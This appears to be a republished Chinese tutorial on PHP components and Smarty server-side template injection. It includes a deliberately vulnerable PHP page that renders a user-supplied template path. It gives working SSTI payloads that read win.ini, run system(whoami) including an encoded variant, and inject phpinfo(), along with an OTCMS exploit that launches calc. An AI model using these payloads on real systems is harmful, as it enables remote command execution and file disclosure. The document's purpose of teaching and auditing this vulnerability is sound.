Web开发-PHP应用组件框架前端模版渲染三方插件富文本编辑器CVE审计

类别

组件/框架

说明

[Web框架]

Laravel

现代化、功能全面的框架,适合大多数Web应用。

Symfony

高度模块化、功能强大的框架,适合复杂应用。

CodeIgniter

轻量级框架,适合快速开发。

Zend Framework (Laminas)

企业级框架,适合大规模应用,具有高扩展性和性能。

Yii

高性能框架,适合快速开发和大规模应用。

[数据库组件]

Doctrine ORM

强大的ORM工具,支持复杂的查询和映射。

Eloquent ORM

Laravel内置ORM,简化数据库操作。

PDO

PHP的数据库抽象层,支持多种数据库引擎。

RedBeanPHP

轻量级ORM,自动创建和管理数据库表。

[模板引擎]

Twig

灵活、现代的模板引擎,常用于Symfony项目。

Blade

Laravel内置模板引擎,支持模板继承和控制结构。

Smarty

经典模板引擎,适合中大型项目。

Mustache

轻量级跨语言模板引擎,支持PHP、JavaScript等。

[路由组件]

FastRoute

高性能PHP路由库,适用于小型应用和API。

AltoRouter

轻量级路由库,适合小型项目,易于配置。

Symfony Routing

Symfony的路由组件,适合复杂应用。

[认证与授权]

OAuth2 Server PHP

实现OAuth2协议的PHP库,适用于API认证。

JWT (JSON Web Token)

轻量级身份验证方案,适合API认证。

PHP-Auth

简单的用户认证库,适用于中小型Web应用。

[支付集成]

Stripe PHP SDK

集成Stripe支付功能,支持信用卡支付、订阅等。

PayPal SDK for PHP

集成PayPal支付功能,支持支付、退款等。

[邮件发送]

PHPMailer

功能强大的邮件发送库,支持SMTP、POP3等协议。

SwiftMailer

另一款流行的邮件发送库,支持多种邮件功能。

Mailgun PHP SDK

Mailgun的官方SDK,用于通过Mailgun API发送邮件。

[文件管理]

Flysystem

文件存储抽象库,支持多种存储方式(如本地、Amazon S3、FTP等)。

Symfony Filesystem

Symfony的文件系统组件,提供简单的文件操作API。

Intervention Image

图片处理库,支持裁剪、调整大小、水印等功能。

[缓存与性能]

Redis

内存数据存储系统,用于缓存、消息队列等,提升性能。

Memcached

内存缓存系统,适用于高并发应用。

Symfony Cache

Symfony缓存组件,支持多种缓存后端。

Laravel Cache

Laravel内置缓存系统,提升Web应用性能。

[日志管理]

Monolog

强大的日志库,支持多种日志渠道(如文件、数据库、邮件等)。

Log4PHP

Apache Log4j的PHP实现,适用于复杂日志功能。

[任务队列]

Laravel Queue

Laravel内置队列系统,支持延迟任务、异步处理。

Resque

基于Redis的任务队列库,适用于异步任务处理。

RabbitMQ

开源消息代理服务,用于任务调度和消息传递。

[WebSocket与实时通信]

Ratchet

用于实现WebSocket服务,适合在线聊天、实时通信。

Swoole

高性能协程框架,支持WebSocket、TCP、UDP等协议,适用于高并发实时应用。

[测试与调试]

PHPUnit

PHP标准单元测试框架,广泛用于自动化测试。

Xdebug

PHP调试工具,支持堆栈跟踪、性能分析、断点调试等功能。

[富文本编辑器]

KindEditor

一个轻量级且功能丰富的富文本编辑器,支持图片上传、插入视频等,适用于PHP开发的Web项目。

TinyMCE

开源的富文本编辑器,支持多种格式的文本编辑,插件丰富,易于集成。

CKEditor

高度可定制的富文本编辑器,支持图片、文件上传、富文本格式化等功能,广泛用于Web项目中。

Froala Editor

轻量级、现代的富文本编辑器,支持图像处理、视频嵌入、内嵌富文本等,适合复杂的Web应用。

Quill

开源富文本编辑器,功能强大、轻量级,支持图片、视频、格式设置等功能,适合单页面应用。

Summernote

基于jQuery的轻量级富文本编辑器,支持文本格式化、图片上传等,适合中小型Web项目。

Trumbowyg

轻量级的富文本编辑器,功能简单但支持基本的文本编辑、图片上传、视频插入等。

Redactor

现代的富文本编辑器,功能丰富,支持图片、文件上传等,适合多种Web应用。

[图片上传组件]

Dropzone.js

支持拖拽上传和多文件上传的JavaScript库,易于与PHP集成,常用于图片、文件上传功能。

FilePond

高度可定制的文件上传库,支持图片预览、验证、上传进度等,适合需要精美上传功能的Web项目。

Fine Uploader

支持多种文件上传方式的组件,支持多文件上传、拖拽上传,支持PHP处理后台。

Plupload

支持多种文件上传方式(包括HTML5和Flash),可以与PHP后台集成,广泛用于Web应用中。

[图片处理组件]

ImageMagick

强大的图像处理库,支持图像格式转换、剪裁、旋转、加水印等多种功能,适用于PHP处理图像。

GD Library

PHP内置图像处理库,支持图像创建、缩放、裁剪、色调调整等功能。

Intervention Image

PHP图像处理库,支持裁剪、缩放、加水印等,易于与Laravel集成。

1、模版引擎

在开始介绍Smarty之前先了解一下模板引擎,模板引擎是为了让前端界(html)与程序代码(php)分离而产生的一种解决方案,简单来说就是html文件里再也不用写php代码了。Smarty的原理是变量替换原则,我们只需在html文件写好Smarty的标签即可,例{name},然后调用Smarty的方法传递变量参数即可。

模版使用案例:

Php模版框架:Smarty、Twig,codeeval等

python模版框架:jinja2、mako、tornad、Django等

Java模版框架:Thymeleaf、jade、velocity、FreeMarker等

JavaScript模版框架:doT,Nunjucks,Pug,Marko,EJS,Dust等

安全漏洞影响:

SSTI(Server Side Template Injection,服务器端模板注入)

搭建这个网站,看一下这个页面

这里就有提示,看这个Title

这里就是替换,这里改掉页面就会随之改变

下载:https://github.com/smarty-php/smarty/releases

使用:

1、创建一个文件夹,命名为smarty-demo。

2、下载Smarty对应版本并解压缩到该文件夹中。

3、创建一个PHP文件,命名为index.php,并在文件中添加以下代码:

<?php

// 引入 Smarty 类文件

require('smarty-demo/libs/Smarty.class.php');

// 创建 Smarty 实例

$smarty=newSmarty;

// 设置 Smarty 相关属性

$smarty->template_dir='smarty-demo/templates/';

$smarty->compile_dir='smarty-demo/templates_c/';

$smarty->cache_dir='smarty-demo/cache/';

$smarty->config_dir='smarty-demo/configs/';

// 赋值变量到模板中

$smarty->assign('title','欢迎使用 Smarty');

// 显示模板

$smarty->display('index.tpl');

?>

4、创建一个名为index.tpl的模板文件,并将以下代码复制到上述点定义文件夹中

<!DOCTYPE html>

<html>

<head>

<title>{$title}</title>

</head>

<body>

<h1>{$title}</h1>

<p>这是一个使用 Smarty 的例子。</p>

</body>

</html>

因此就能得到一些安全问题,注入漏洞,比如说渲染文件受控,这里我做一下解释,就是设置Smarty相关属性这里,就是生成的文件保存位置,再往下赋值变量到模板中,就是一个键名对应一个键值,title对应Smarty。最后就是显示模板,这里显示模板就去调用了index.tpl文件,我们当前文件是demo.php,通过这个$smarty->display($_GET['page'])这个点就能实现任意文件读取

这里我们试试poc,看一下具体实现方法

<?php
require 'smarty4/libs/Smarty.class.php';
$smarty = new Smarty;// 设置 Smarty 相关属性
$smarty->template_dir = 'smarty4/templates/';
$smarty->compile_dir = 'smarty4/templates_c/';
$smarty->cache_dir = 'smarty4/cache/';
$smarty->config_dir = 'smarty4/configs/';
// 赋值变量到模板中
$smarty->assign('title', 'Smarty');
$smarty->assign('css', 'styles.css');
// 显示模板
$smarty->display('index.tpl');
//受控的渲染页面文件
$smarty->display($_GET['page']);//白盒代码审计的思路:
//1、使用smarty模版引擎
//2、版本存在已知的CVE漏洞
//3、可控的渲染文件或变量//黑盒渗透测试的思路
//x.php?page= url=  index.tpl index.html
把poc传到传参点尝试

poc:

string:{include file='C:/Windows/win.ini'}

poc:

string:{function name='x(){};system(whoami);function '}{/function}

poc:

string:{$smarty.template_object->smarty->_getSmartyObj()->display('string:{system(whoami)}')}

poc总结:这些poc不难看出,都是一些文件可控

这里切换成smarty4版本依然可以的

这里能看到配置文件

这里我们打开看一下就能发现是相应的payload,string:{include file='C:/Windows/win.ini'}

再来看一个源码*/phpinfo();//,这个就是payload能注入成功的原因,就是原本是/*"test:"*/,

然后我们构造的时候,就是/*"test:*/phpinfo();//"*/,把前面的闭合了,然后//把后面的注释了

懂了噻

#渲染文件受控

CVE参考:

https://xz.aliyun.com/t/11108

https://www.cnblogs.com/magic-zero/p/8351974.html

*/phpinfo();//

string:{include file='C:/Windows/win.ini'}

string:{function name='x(){};system(whoami);function '}{/function}

string:{$smarty.template_object->smarty->_getSmartyObj()->display('string:{system(whoami)}')}

eval:{math equation='("\163\171\163\164\145\155")("\167\150\157\141\155\151")'}

2、插件组件

编辑器,邮箱,图片处理等(见上图)

使用:

https://www.cnblogs.com/qq350760546/p/6669112.html

参考:

https://www.cnblogs.com/linglinglingling/p/18040866

https://blog.csdn.net/weixin_58099903/article/details/125810825

3、案例:

代码审CMS:(由第三方应用引用导致安全问题)

用了第三方插件、模板、组件等,引用了就会有相关漏洞

-网钛(OTCMS):

https://xz.aliyun.com/t/13432

-Kindeditor:https://www.cnblogs.com/TaoLeonis/p/14899198.html

搭建一下这个平台

payload:

{otcms:$smarty.template_object->smarty->_getSmartyObj()->display('string:{otcms:system(calc)}')}

这里插入payload,记得要改一下头,不是string,改成otcms即可,弹一个计算器尝试一下

然后保存一下

ok,成功弹出计算器

看下源码,这里是smart模板,为了有更好的兼容性还判断了一下php版本,php版本小于7.1大于4.x调用smarty

这里顺着上面的目录就能找到了我们执行的命令,cache/smarty/templates_c目录下的就是

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/web/91466.shtml
繁体地址,请注明出处:http://hk.pswp.cn/web/91466.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Spring Boot Actuator 保姆级教程

1. 引言 Spring Boot Actuator 是一个功能强大的监控工具&#xff0c;能够帮助开发者监控和管理应用的运行状态。通过 Actuator&#xff0c;我们可以轻松获取应用的健康状况、配置信息、性能指标等。本文将一步步引导你如何配置和使用 Actuator&#xff0c;以及如何通过它来监控…

使用 whisper, 音频分割, 初步尝试,切割为小块,效果还不错 1

对于一首歌而言,如何断句?即,一个 mp4 或是 mp3 文件,或是一段录音, 如何使用程序,或是 ai 来断句。分割为一句一句的片段??如果人工来分割,一般是使用 capcut 之类的剪辑软件。但是效率太慢了。所以我想能否设计一个简洁的,自动的程序来处理。这种事情,专业的名称…

AD2S1210的DOS LOT含义

一、​​信号质量监控类寄存器​​​​LOT阈值&#xff08;0x88&#xff09;​​​​作用​​&#xff1a;设定信号丢失&#xff08;Loss of Signal&#xff09;的判定门槛。​​场景​​&#xff1a;当正弦或余弦输入信号幅值低于此值时&#xff0c;芯片认为信号丢失&#xff…

Au速成班-多轨编辑流程

基础编辑工作流&#xff0c;包含文件导入&#xff0c;导出&#xff0c;音量调节&#xff0c;部分效果添加。 创建多轨会话 设置工程文件名称、文件位置、采样率、位深度、主控等。 界面管理 &#xff0c;界面说明详细可看 Au速成班-基础篇_au界面介绍-CSDN博客 音量调节点击…

Rust实现GPU驱动的2D渲染引擎

当传统CPU渲染遭遇性能瓶颈时&#xff0c;GPU驱动的架构正在革新2D图形领域。本文将深入解析用Rust编写的​​完全GPU驱动的2D渲染引擎Vello​​&#xff0c;揭秘其如何通过并行计算实现丝滑渲染。 一、GPU Driven革命&#xff1a;为何是Vello&#xff1f; 传统渲染的瓶颈 传…

【ELasticsearch】温、冷数据节点能是同一个节点吗

温、冷数据节点能是同一个节点吗1.节点角色与分层存储原理2.一个节点能否同时是 “温” 和 “冷” 节点 &#xff1f;3.为什么通常不是最佳实践 &#xff1f;4.可能的适用场景&#xff08;非常有限&#xff09;5.结论在 Elasticsearch 中&#xff0c;理论上&#xff0c;一个物理…

报错:selenium.common.exceptions.ElementNotInteractableException: Message

针对该错误&#xff0c;以下是分步解决方案&#xff1a; 1. 显式等待确保元素可交互 from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC# 等待元素可点…

sqli-labs:Less-10关卡详细解析

1. 思路&#x1f680; 本关的SQL语句为&#xff1a; $id ".$id."; $sql"SELECT * FROM users WHERE id$id LIMIT 0,1";注入类型&#xff1a;字符串型&#xff08;双引号包裹&#xff09;提示&#xff1a;参数id需以"闭合 php回显输出语句的代码如…

imx6ull-驱动开发篇5——新字符设备驱动实验

目录 前言 新字符设备驱动原理 申请设备号 注册设备号 释放设备号 注册方法 字符设备结构cdev cdev_init 函数 cdev_add 函数 cdev_del 函数 自动创建设备节点 mdev 机制 类创建函数 类删除函数 创建设备函数 删除设备函数 设置文件私有数据 实验程序编写 l…

2025年最新SCI-灰熊增脂优化器(Grizzly Bear Fat Increase, GBF)-附完整Matlab免费代码

1、简介 本文介绍了一种新的受自然启发的优化算法&#xff0c;称为灰熊增脂优化器&#xff08;GBFIO&#xff09;。GBFIO算法模仿灰熊积累体脂为过冬做准备的自然行为&#xff0c;利用它们的狩猎、捕鱼和吃草、蜂蜜等策略。因此&#xff0c;GBFIO算法建模并考虑了三个数学步骤来…

Python爬虫02_Requests实战网页采集器

一、Request请求伪装解析 #UA&#xff1a;User-Agent&#xff08;请求载体身份标识&#xff09; #UA检测&#xff1a;门户网站的服务器会检测对应请求的载体身份标识&#xff0c;如果检测到请求的载体身份呢标识为某一款浏览器&#xff0c;说明该请求是一个正常的请求&#xff…

vue+elementui实现问卷调查配置可单选、多选、解答

效果&#xff1a;<template> <div><el-form :inline"true" :model"form" :rules"rules" ref"ruleForm"> <el-tabs type"border-card" v-model"cardType"><el-tab-pane name"1&qu…

Docker初学者需要了解的几个知识点(三):Docker引擎与Docker Desktop

Docker引擎与Docker Desktop简单说&#xff1a;Docker 引擎是干活的 “核心工具”&#xff0c;负责实际创建、运行容器&#xff0c;就像汽车的发动机&#xff0c;没它跑不起来。Docker Desktop是个 “套装软件”&#xff0c;它把 Docker 引擎打包进去了&#xff0c;还加了图形化…

Python将Word转换为Excel

现有大量的Word文档&#xff0c;每个文档中有大量的表格&#xff0c;需要将其转换为Excel。 Python处理源码 # 需要安装pip install xlsxwriter import pandas as pd from docx import Document from pathlib import Path from datetime import datetimedef process_docx(filep…

攀爬误报率↓82%!陌讯多模态算法在周界防护的实战解析

​摘要​​ 原创声明 本文解析边缘计算优化下陌讯视觉算法在攀爬识别场景的鲁棒性提升&#xff0c;实测数据来自陌讯技术白皮书&#xff08;2025&#xff09;。针对传统安防系统在复杂光影、姿态变化中的误检问题&#xff0c;重点阐述动态决策机制与轻量化部署方案&#xff0c;…

Redis 存在哪些问题

内存相关问题 1. 内存消耗大 无压缩机制&#xff1a;数据以明文形式存储&#xff0c;占用内存较大元数据开销&#xff1a;每个key-value对都有额外的元数据开销内存碎片&#xff1a;频繁的更新操作可能产生内存碎片 2. 内存容量限制 单机容量受限&#xff1a;受限于单台服务器的…

ECMAScript2025(ES16)新特性

概述 ECMAScript2025于2025年6月26日正式发布&#xff0c; 本文会介绍ECMAScript2025(ES16)&#xff0c;即ECMAScript的第16个版本的新特性。 以下摘自官网&#xff1a;ecma-262 ECMAScript 2025, the 16th edition, added a new Iterator global with associated static and…

Vim 编辑器工作模式及操作指南

Vim 编辑器工作模式及操作指南 一、工作模式概述 Vim编辑器主要包含四种工作模式&#xff0c;分别是&#xff1a; 命令模式&#xff08;默认进入模式&#xff09;输入模式&#xff08;编辑模式&#xff09;末行模式&#xff08;指令模式&#xff09;可视模式 二、模式切换及操作…

Rabbitmq中常见7种模式介绍

p&#xff1a;生成者&#xff0c;生成消息的程序c&#xff1a;消费者&#xff0c;消费消息的程序Queue&#xff1a;消息队列&#xff0c;用于缓存消息&#xff0c;生产者向里面投递消息&#xff0c;消费者从里面拿取消息消费X&#xff1a;交换机&#xff0c;在rabbitMQ中&#…

SpringAI 1.0.0发布:打造企业级智能聊天应用

官方文档 gitee的demo 1、前言 2025年5月&#xff0c;SpringAI 1.0.0终于正式发布。这不仅是另一个普通的库&#xff0c;更是将Java和Spring推向AI革命前沿的战略性举措。给Java生态带来了强大且全面的AI工程解决方案。众多企业级应用在SpringBoot上运行关键业务&#xff0c…